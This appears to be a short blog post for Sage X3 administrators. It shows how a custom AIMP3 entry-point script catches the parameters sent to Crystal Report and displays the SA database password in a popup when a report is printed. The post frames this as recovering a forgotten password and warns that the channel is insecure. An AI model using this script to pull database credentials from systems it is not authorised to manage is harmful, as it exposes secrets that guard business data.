Blog navigation

Latest posts

Exploiting Software Security Vulnerabilities in Sage X3

 

This solution exposes a security vulnerability in the software and deviates from the standard approach.

Keep in mind that Sage X3 calls an external program named Crystal Report for generating reports.

The communication between these software components is not secure and could be exploited if accessed by partners or customers.

This operation should not be performed for external and untrusted resources.

Problem:

The management console encrypts the database password field, and recovering it might be challenging.

Sage X3 Console
Pre-requisite:

- Access to Sage X3 folder with Eclipse or Script Editor is required.

- Setup AIMP3 Entry point.

Solution: AIMP3 Entry point code:

$ACTION

Case ACTION

When "PARAM": Gosub RECOVERY

Endcase

Return

$RECOVERY

For IT=1 To NBPAR

If find(left$(PARAMETRE(IT), 12), "__DBPASSWORD"): Infobox PARAMETRE(IT) : Endif

Next IT

Return

Afterward, printing anything with Sage X3 based on Crystal Report triggers a popup containing the database password for the SA login.

Sage X3 Infbox
 
Posted in: Sage X3, Configuration